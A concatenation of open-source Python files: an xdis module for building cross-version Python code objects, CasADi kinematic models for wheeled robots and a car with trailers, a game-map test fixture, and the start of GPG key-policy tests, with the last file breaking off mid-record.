# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# PYTHON_VERSION is referenced in Code38.freeze() below; assuming xdis
# exposes it alongside PYTHON3, as the rest of this module expects.
from xdis import PYTHON3, PYTHON_VERSION
import inspect, types
class Code3:
"""Class for a Python3 code object used when a Python interpreter less than 3 is
working on Python3 bytecode. It also functions as an object that can be used
to build or write a Python3 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
# Mimic Python 3 code access functions
def __len__(self):
return len(self.co_code)
def __getitem__(self, i):
op = self.co_code[i]
if isinstance(op, str):
op = ord(op)
return op
def encode_lineno_tab(self):
co_lnotab = b""
prev_line_number = self.co_firstlineno
prev_offset = 0
for offset, line_number in self.co_lnotab:
offset_diff = offset - prev_offset
line_diff = line_number - prev_line_number
prev_offset = offset
prev_line_number = line_number
while offset_diff >= 256:
co_lnotab += bytearray([255, 0])
offset_diff -= 255
while line_diff >= 256:
co_lnotab += bytearray([0, 255])
line_diff -= 255
co_lnotab += bytearray([offset_diff, line_diff])
self.co_lnotab = co_lnotab
def freeze(self):
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
self.encode_lineno_tab()
if PYTHON3:
args = (
self.co_argcount,
self.co_kwonlyargcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_firstlineno,
self.co_lnotab,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
else:
return self
def check(self):
for field in "co_argcount co_kwonlyargcount, co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
class Code38(Code3):
"""Class for a Python3.8 code object used when a Python interpreter less than 3.8 is
working on Python3 bytecode. It also functions as an object that can be used
to build or write a Python3 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_posonlyargcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
self.co_posonlyargcount = co_posonlyargcount
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
def freeze(self):
        # FIXME we could call super and then have just the diffs below
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
self.encode_lineno_tab()
if PYTHON_VERSION >= 3.8:
args = (
self.co_argcount,
self.co_posonlyargcount,
self.co_kwonlyargcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_firstlineno,
self.co_lnotab,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
else:
return self
def check(self):
for field in "co_argcount co_posonlyargcount co_kw_onlyargcount co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
class Code3Compat(Code3):
"""A much more flexible version of Code. We don't require
    kwonlyargcount which doesn't exist in Python 2. You can also fill
    in what you want and leave the rest blank. Remember though to
    call inherited function freeze when done.
"""
def __init__(
self,
co_argcount=0,
co_kwonlyargcount=0,
co_nlocals=0,
co_stacksize=0,
co_flags=[],
co_code=[],
co_consts=[],
co_names=[],
co_varnames=[],
co_filename="unknown",
co_name="unknown",
co_firstlineno=1,
co_lnotab="",
co_freevars=[],
co_cellvars=[],
):
self.co_argcount = co_argcount
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
def __repr__(self):
return '<code3 object %s at 0x%0x, file "%s", line %d>' % (
self.co_name,
id(self),
self.co_filename,
self.co_firstlineno,
)
def code3compat(co):
return Code3Compat(
co.co_argcount,
co.co_kwonlyargcount,
co.co_nlocals,
co.co_stacksize,
co.co_flags,
co.co_code,
co.co_consts,
co.co_names,
co.co_varnames,
co.co_filename,
co.co_name,
co.co_firstlineno,
co.co_lnotab,
co.co_freevars,
co.co_cellvars,
)
class Code2:
"""Class for a Python2 code object used when a Python 3 interpreter is
working on Python2 bytecode. It also functions as an object that can be used
to build or write a Python2 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
`co_consts`, co_names which are (immutable) tuples in the end-result can be stored
instead as (mutable) lists. Likewise the line number table `co_lnotab`
can be stored as a simple list of offset, line_number tuples.
"""
def __init__(
self,
co_argcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
# Note: There is no kwonlyargcount in Python2
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
return
# Mimic Python 3 code access functions
def __len__(self):
return len(self.co_code)
def __getitem__(self, i):
op = self.co_code[i]
if isinstance(op, str):
op = ord(op)
return op
    def encode_lineno_tab(self):
        # Encode a list of (offset, line_number) pairs into the packed
        # co_lnotab byte-pair format: each emitted pair is (offset delta,
        # line delta), with (255, 0) and (0, 255) filler pairs whenever a
        # delta exceeds 255.  (The Python 2 format assumes nondecreasing
        # deltas; negative line deltas are not handled here.)
        co_lnotab = ""
        prev_line_number = self.co_firstlineno
        prev_offset = 0
        for offset, line_number in self.co_lnotab:
            offset_diff = offset - prev_offset
            line_diff = line_number - prev_line_number
            prev_offset = offset
            prev_line_number = line_number
            while offset_diff >= 256:
                co_lnotab += chr(255) + chr(0)
                offset_diff -= 255
            while line_diff >= 256:
                co_lnotab += chr(0) + chr(255)
                line_diff -= 255
            co_lnotab += chr(offset_diff)
            co_lnotab += chr(line_diff)
        self.co_lnotab = co_lnotab
def freeze(self):
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
if isinstance(self.co_lnotab, list):
# We assume we have a list of tuples:
# (offset, linenumber) which we convert
# into the encoded format
# FIXME: handle PYTHON 3
self.encode_lineno_tab()
if PYTHON3:
if hasattr(self, "co_kwonlyargcount"):
delattr(self, "co_kwonlyargcount")
return self
else:
args = (
self.co_argcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_firstlineno,
self.co_lnotab,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
def check(self):
for field in "co_argcount co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
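# --- Illustrative usage (added sketch). ---
# encode_lineno_tab() packs (offset, line_number) pairs into byte-pair
# deltas: with co_firstlineno=1, the pairs (0, 1) then (6, 2) become
# chr(0)+chr(0) followed by chr(6)+chr(1).
def _demo_encode_lineno_tab():
    code = Code2(
        0, 0, 0, 0, 0,  # argcount, kwonlyargcount, nlocals, stacksize, flags
        b"", (), (), (),  # code, consts, names, varnames
        "demo", "demo", 1,  # filename, name, firstlineno
        [(0, 1), (6, 2)],  # lnotab as (offset, line_number) pairs
        (), (),  # freevars, cellvars
    )
    code.encode_lineno_tab()
    return code.co_lnotab  # == "\x00\x00\x06\x01"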
class Code2Compat(Code2):
"""A much more flexible version of Code. We don't require kwonlyargcount which
doesn't exist. You can also fill in what you want and leave the rest blank.
Remember though to call inherited function freeze when done.
"""
def __init__(
self,
co_argcount=0,
co_nlocals=0,
co_stacksize=0,
co_flags=[],
co_code=[],
co_consts=[],
co_names=[],
co_varnames=[],
co_filename="unknown",
co_name="unknown",
co_firstlineno=1,
co_lnotab="",
co_freevars=[],
co_cellvars=[],
):
self.co_argcount = co_argcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
self.co_name = co_name
self.co_firstlineno = co_firstlineno
self.co_lnotab = co_lnotab
self.co_freevars = co_freevars
self.co_cellvars = co_cellvars
def __repr__(self):
return '<code2 object %s at 0x%0x, file "%s", line %d>' % (
self.co_name,
id(self),
self.co_filename,
self.co_firstlineno,
)
class Code14:
"""Class for a Python 1.4 code object used when a Python 2 or 3 interpreter is
working on Python 1.4 bytecode. It also functions as an object that can be used
to build or write a Python 1.4 code object, since we allow mutable structures.
When done mutating, call method freeze().
For convenience in generating code objects, fields like
    `co_consts` and `co_names`, which are (immutable) tuples in the end result,
    can be stored instead as (mutable) lists. Likewise the line-number table
    `co_lnotab` can be stored as a simple list of (offset, line_number) tuples.
"""
def __init__(
self,
co_argcount,
co_kwonlyargcount,
co_nlocals,
co_stacksize,
co_flags,
co_code,
co_consts,
co_names,
co_varnames,
co_filename,
co_name,
co_firstlineno,
co_lnotab,
co_freevars,
co_cellvars,
):
self.co_argcount = co_argcount
        # Note: There is no kwonlyargcount in Python 1.4 (nor in Python 2)
self.co_kwonlyargcount = co_kwonlyargcount
self.co_nlocals = co_nlocals
self.co_stacksize = co_stacksize
self.co_flags = co_flags
self.co_code = co_code
self.co_consts = co_consts
self.co_names = co_names
self.co_varnames = co_varnames
self.co_filename = co_filename
        self.co_name = co_name
        self.co_firstlineno = co_firstlineno
        self.co_lnotab = co_lnotab
        self.co_freevars = co_freevars
        self.co_cellvars = co_cellvars
return
# Mimic Python 3 code access functions
def __len__(self):
return len(self.co_code)
def __getitem__(self, i):
op = self.co_code[i]
if isinstance(op, str):
op = ord(op)
return op
def freeze(self):
for field in "co_consts co_names co_varnames co_freevars co_cellvars".split():
val = getattr(self, field)
if isinstance(val, list):
setattr(self, field, tuple(val))
if isinstance(self.co_lnotab, dict):
d = self.co_lnotab
self.co_lnotab = sorted(zip(d.keys(), d.values()), key=lambda tup: tup[0])
        if isinstance(self.co_lnotab, list):
            # We assume we have a list of (offset, line_number) tuples,
            # which we convert into the encoded format.  Code14 defines
            # no encoder of its own, so borrow Code2's.
            # FIXME: handle PYTHON 3
            Code2.encode_lineno_tab(self)
if PYTHON3:
if hasattr(self, "co_kwonlyargcount"):
delattr(self, "co_kwonlyargcount")
return self
else:
args = (
self.co_argcount,
self.co_nlocals,
self.co_stacksize,
self.co_flags,
self.co_code,
self.co_consts,
self.co_names,
self.co_varnames,
self.co_filename,
self.co_name,
self.co_freevars,
self.co_cellvars,
)
return types.CodeType(*args)
def check(self):
for field in "co_argcount co_nlocals co_flags co_firstlineno".split():
val = getattr(self, field)
assert isinstance(val, int), "%s should be int, is %s" % (field, type(val))
for field in "co_consts co_names co_varnames".split():
val = getattr(self, field)
assert isinstance(val, tuple), "%s should be tuple, is %s" % (
field,
type(val),
)
def code2compat(co):
return Code2Compat(
co.co_argcount,
co.co_nlocals,
co.co_stacksize,
co.co_flags,
co.co_code,
co.co_consts,
co.co_names,
co.co_varnames,
co.co_filename,
co.co_name,
co.co_firstlineno,
co.co_lnotab,
co.co_freevars,
co.co_cellvars,
)
def iscode(obj):
"""A replacement for inspect.iscode() which we can't used because we may be
using a different version of Python than the version of Python used
in creating the byte-compiled objects. Here, the code types may mismatch.
"""
return inspect.iscode(obj) or isinstance(obj, Code3) or isinstance(obj, Code2)
def code_has_star_arg(code):
"""Return True iff
the code object has a variable positional parameter (*args-like)"""
return (code.co_flags & 4) != 0
def code_has_star_star_arg(code):
"""Return True iff
The code object has a variable keyword parameter (**kwargs-like)."""
return (code.co_flags & 8) != 0
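# --- Illustrative usage (added sketch). ---
# CO_VARARGS is flag bit 4 and CO_VARKEYWORDS is flag bit 8, so both
# predicates fire for a function taking *args and **kwargs:
def _demo_star_args():
    def fn(a, *args, **kwargs):
        return a, args, kwargs

    assert code_has_star_arg(fn.__code__)
    assert code_has_star_star_arg(fn.__code__)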
----- [record] hexsha: e50c6a92bcbaedabf4b5c621dbc4b4f9e8da18b4 | size: 10,491 | lang: Python | path: carlike_w_trailers/robot_models.py | repo: MohamedNaveed/Stochastic_Optimal_Control_algos @ c89dcf4f312302bee963eeb34408d7a957f8bbcd | licenses: [MIT] | stars: 2 (2019-09-10T18:27:49 .. 2020-03-26T13:23:22) -----
# Author: Mohamed Naveed Gul Mohamed
# email:mohdnaveed96@gmail.com
# Date: Oct 11th 2019
#
# Dynamic models.
import casadi as c
import math as m
import numpy as np
class youBot_model(object):
"""
model specification and dynamics
"""
def __init__(self, length=0.58, breadth = 0.38, ang_vel_max=m.pi/6, vel_max=.8, dt=0.1, nx=3, nu=3):
self.length = length
self.breadth = breadth
self.ang_vel_max = ang_vel_max
#self.ang_accel_max = ang_accel_max
self.vel_max = vel_max
#self.accel_max = accel_max
self.dt = dt
self.nx = nx
self.nu = nu
self.A = c.DM.eye(self.nx) #youBot has a linear model
self.B = c.DM.eye(self.nu)*self.dt
self.G = c.DM.eye(self.nu)*self.dt
self.x = c.MX.sym('x', self.nx,1)
self.u = c.MX.sym('u', self.nu,1)
self.Sigma_w = c.DM([[self.vel_max**2,0,0],[0,self.vel_max**2,0],[0,0,self.ang_vel_max**2]])
def proc_model(self):
f = c.Function('f',[self.x,self.u],[self.x + self.u*self.dt])
A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.x)]) #linearization
B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.u)])
return f,A, B
def kinematics(self, state, vx, vy, vtheta, epsilon=0):
f,_,_ = self.proc_model()
#vx = vx + epsilon*self.vel_max*np.random.normal(0,1)
#vy = vy + epsilon*self.vel_max*np.random.normal(0,1)
#vtheta = vtheta + epsilon*self.ang_vel_max*np.random.normal(0,1)
w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
w2 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[2,2]))
w = c.DM([[w0],[w1],[w2]])
#state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
state_n = f(state,c.blockcat([[vx],[vy],[vtheta]])) + c.mtimes(self.G,w)
state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
return state_n
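# --- Illustrative usage (added sketch; the step values are arbitrary). ---
# One noiseless Euler step of the holonomic youBot model (epsilon=0 zeroes
# the process noise drawn from Sigma_w):
def _demo_youbot_step():
    bot = youBot_model()
    x0 = c.DM([0.0, 0.0, 0.0])
    return bot.kinematics(x0, vx=0.5, vy=0.0, vtheta=0.1)  # DM of shape (3, 1)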
class car_model(object):
"""
model specification and dynamics
"""
def __init__(self, length=0.58, breadth = 0.38, ang_vel_max=m.pi/6, vel_max=.8, dt=0.1, nx=4, nu=2):
self.length = length
self.breadth = breadth
self.ang_vel_max = ang_vel_max
#self.ang_accel_max = ang_accel_max
self.vel_max = vel_max
#self.accel_max = accel_max
self.dt = dt
self.nx = nx
self.nu = nu
# self.A = c.DM.eye(self.nx) #youBot has a linear model
# self.B = c.DM.eye(self.nu)*self.dt
# self.G = c.DM.eye(self.nu)*self.dt
self.x = c.MX.sym('x', self.nx,1)
self.u = c.MX.sym('u', self.nu,1)
self.Sigma_w = c.DM([[self.vel_max**2,0],[0,self.ang_vel_max**2]])
def proc_model(self):
# f = c.Function('f',[self.x,self.u],[self.x[0] + self.u[0]*c.cos(self.x[2])*self.dt,
# self.x[1] + self.u[0]*c.sin(self.x[2])*self.dt,
# self.x[2] + self.u[0]*c.tan(self.x[3])*self.dt/self.length,
# self.x[3] + self.u[1]*self.dt])
g = c.MX(self.nx,self.nu)
g[0,0] = c.cos(self.x[2]); g[0,1] = 0;
g[1,0] = c.sin(self.x[2]); g[1,1] = 0;
g[2,0] = c.tan(self.x[3])/self.length; g[2,1] = 0
g[3,0] = 0; g[3,1] = 1;
f = c.Function('f',[self.x,self.u],[self.x + c.mtimes(g,self.u)*self.dt])
# A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.x),
# c.jacobian(f(self.x,self.u)[1],self.x),
# c.jacobian(f(self.x,self.u)[2],self.x),
# c.jacobian(f(self.x,self.u)[3],self.x)]) #linearization
# B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.u),
# c.jacobian(f(self.x,self.u)[1],self.u),
# c.jacobian(f(self.x,self.u)[2],self.u),
# c.jacobian(f(self.x,self.u)[3],self.u)])
A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.x)])
B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.u)])
return f,A, B
def kinematics(self, state, U, epsilon=0):
f,_,_ = self.proc_model()
w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
w = c.DM([[w0],[w1]])
#state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
state_n = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))
# state_n = c.MX(self.nx,1)
# state_n[0] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[0]
# state_n[1] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[1]
# state_n[2] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[2]
# state_n[3] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[3]
state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
return state_n
# def kinematics_DM(self, state, U, epsilon=0):
#
# f,_,_ = self.proc_model()
#
# w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
# w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
#
#
# w = c.DM([[w0],[w1]])
#
# #state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
#
# state_n = c.DM(self.nx,1)
# state_n[0] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[0]
# state_n[1] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[1]
# state_n[2] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[2]
# state_n[3] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[3]
#
# state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
#
# return state_n
class car_w_trailers(object):
"""
model specification and dynamics
"""
def __init__(self, length=0.58, breadth = 0.38, trailer_length = 0.3, ang_vel_max=m.pi/3, vel_max=3, dt=0.1, nx=6, nu=2):
self.length = length
self.breadth = breadth
self.trailer_length = trailer_length
self.ang_vel_max = ang_vel_max
#self.ang_accel_max = ang_accel_max
self.vel_max = vel_max
#self.accel_max = accel_max
self.dt = dt
self.nx = nx
self.nu = nu
# self.A = c.DM.eye(self.nx) #youBot has a linear model
# self.B = c.DM.eye(self.nu)*self.dt
# self.G = c.DM.eye(self.nu)*self.dt
self.x = c.MX.sym('x', self.nx,1)
self.u = c.MX.sym('u', self.nu,1)
self.Sigma_w = c.DM([[self.vel_max**2,0],[0,self.ang_vel_max**2]])
def proc_model(self):
# f = c.Function('f',[self.x,self.u],[self.x[0] + self.u[0]*c.cos(self.x[2])*self.dt,
# self.x[1] + self.u[0]*c.sin(self.x[2])*self.dt,
# self.x[2] + self.u[0]*c.tan(self.x[3])*self.dt/self.length,
# self.x[3] + self.u[1]*self.dt])
g = c.MX(self.nx,self.nu)
g[0,0] = c.cos(self.x[2]); g[0,1] = 0;
g[1,0] = c.sin(self.x[2]); g[1,1] = 0;
g[2,0] = c.tan(self.x[3])/self.length; g[2,1] = 0
g[3,0] = 0; g[3,1] = 1;
g[4,0] = c.sin(self.x[2] - self.x[4])/self.trailer_length; g[4,1] = 0
g[5,0] = c.cos(self.x[2] - self.x[4])*c.sin(self.x[4] - self.x[5])/self.trailer_length; g[5,1] = 0
f = c.Function('f',[self.x,self.u],[self.x + c.mtimes(g,self.u)*self.dt])
# A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.x),
# c.jacobian(f(self.x,self.u)[1],self.x),
# c.jacobian(f(self.x,self.u)[2],self.x),
# c.jacobian(f(self.x,self.u)[3],self.x)]) #linearization
# B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u)[0],self.u),
# c.jacobian(f(self.x,self.u)[1],self.u),
# c.jacobian(f(self.x,self.u)[2],self.u),
# c.jacobian(f(self.x,self.u)[3],self.u)])
A = c.Function('A',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.x)])
B = c.Function('B',[self.x,self.u],[c.jacobian(f(self.x,self.u),self.u)])
return f,A, B
def kinematics(self, state, U, epsilon=0):
f,_,_ = self.proc_model()
w0 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[0,0]))
w1 = epsilon*np.random.normal(0,np.sqrt(self.Sigma_w[1,1]))
w = c.DM([[w0],[w1]])
#state_n = state + self.dt*c.blockcat([[vx],[vy],[vtheta]])
state_n = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))
# state_n = c.MX(self.nx,1)
# state_n[0] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[0]
# state_n[1] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[1]
# state_n[2] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[2]
# state_n[3] = f(state,c.blockcat([[U[0] + w[0]],[U[1] + w[1]]]))[3]
state_n[2] = c.atan2(c.sin(state_n[2]),c.cos(state_n[2]))
state_n[4] = c.atan2(c.sin(state_n[4]),c.cos(state_n[4]))
state_n[5] = c.atan2(c.sin(state_n[5]),c.cos(state_n[5]))
return state_n
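# --- Illustrative rollout (added sketch; control values are arbitrary). ---
# Drive the car-with-trailers model forward under a constant control with
# no process noise; kinematics keeps the heading and hitch angles wrapped.
def _demo_trailer_rollout(steps=10):
    model = car_w_trailers()
    state = c.DM.zeros(model.nx, 1)
    u = [1.0, 0.0]  # forward velocity, zero steering rate
    for _ in range(steps):
        state = model.kinematics(state, u, epsilon=0)
    return state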
----- [record] hexsha: e53f9d2e35397e7176d7d35805829d01ef7cfb54 | size: 1,549 | lang: Python | path: test2/test_main.py | repo: gr0mph/OceanOfCode @ 336caa00e22ae06e12d32971f84c82e3c0c9a3a4 | licenses: [MIT] -----
# Unittest
import unittest
import copy
WIDTH, HEIGHT = 15, 15
TREASURE_MAP = []
TREASURE_MAP.append(list('.xx.....xx.....'))
TREASURE_MAP.append(list('........xx.....'))
TREASURE_MAP.append(list('.xx............'))
TREASURE_MAP.append(list('.xx............'))
TREASURE_MAP.append(list('....xx.........'))
TREASURE_MAP.append(list('....xx.....xx..'))
TREASURE_MAP.append(list('...........xx..'))
TREASURE_MAP.append(list('...............'))
TREASURE_MAP.append(list('..........xx...'))
TREASURE_MAP.append(list('..........xx.xx'))
TREASURE_MAP.append(list('..........xx.xx'))
TREASURE_MAP.append(list('.....xx........'))
TREASURE_MAP.append(list('.....xx........'))
TREASURE_MAP.append(list('.....xx........'))
TREASURE_MAP.append(list('.....xx........'))
TEXT1 = 'MOVE N'
TEXT2 = 'SILENCE'
TEXT3 = 'TORPEDO 0 0|MOVE E'
TEXT4 = 'SURFACE 5'
TEXT5 = 'TORPEDO 11 1|MOVE N'
TEXT6 = 'MOVE N|SURFACE 5|TORPEDO 11 1|SILENCE'
MINE_MAP = []
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' . . . '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' . . . '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' . . . '))
MINE_MAP.append(list(' . . . . . . '))
MINE_MAP.append(list(' '))
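# --- Added sanity check (sketch; not part of the original fixtures). ---
# TREASURE_MAP above is a 15x15 grid, so its shape should match WIDTH/HEIGHT:
class TestFixtureShapes(unittest.TestCase):
    def test_treasure_map_dimensions(self):
        self.assertEqual(len(TREASURE_MAP), HEIGHT)
        for row in TREASURE_MAP:
            self.assertEqual(len(row), WIDTH)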
----- [record] hexsha: e552bba85f91e4cadcc2020d0f9a38227ddfb9fb | size: 27,973 | lang: Python | path: tests/test_key_other.py | repo: mgorny/glep63-check @ 820dd55e3c667edfaeff165cd990c121f436c108 | licenses: [BSD-2-Clause] | stars: 4 (2018-07-21T20:04:37 .. 2019-05-06T12:26:56) | issues: 1 (2018-07-21T19:54:38) -----
# glep63-check -- tests for other key issues
# (c) 2018-2019 Michał Górny
# Released under the terms of 2-clause BSD license.
import datetime
from glep63.base import (PublicKey, Key, UID, KeyAlgo, Validity,
KeyWarning, KeyIssue, SubKeyWarning)
import tests.key_base
class ExpiredKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/expired-key.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:e:4096:1:DB44A8BC23B67AF4:946681246:946767646::-:::sc::::::23::0:
fpr:::::::::723AADD29743D410B5CAD9CEDB44A8BC23B67AF4:
uid:e::::946681246::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:e:4096:1:D4E7C940C84DD0DA:946681260:1545865383:::::s::::::23:
fpr:::::::::A23A271C81A008C088BB0A2CD4E7C940C84DD0DA:
'''
KEY = PublicKey(
validity=Validity.EXPIRED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='DB44A8BC23B67AF4',
creation_date=datetime.datetime(1999, 12, 31, 23, 0, 46),
expiration_date=datetime.datetime(2000, 1, 1, 23, 0, 46),
key_caps='sc',
curve='',
subkeys=[
Key(
validity=Validity.EXPIRED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D4E7C940C84DD0DA',
creation_date=datetime.datetime(1999, 12, 31, 23, 1),
expiration_date=datetime.datetime(2018, 12, 26, 23, 3, 3),
key_caps='s',
curve='',
),
],
uids=[
UID(
validity=Validity.EXPIRED,
